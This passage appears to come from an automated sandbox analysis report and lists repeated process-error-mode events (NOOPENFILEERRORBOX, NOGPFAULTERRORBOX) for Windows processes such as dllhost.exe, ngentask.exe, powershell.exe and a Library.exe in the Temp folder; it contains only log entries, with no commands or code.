              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\fontview.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\fontview.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\Library.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
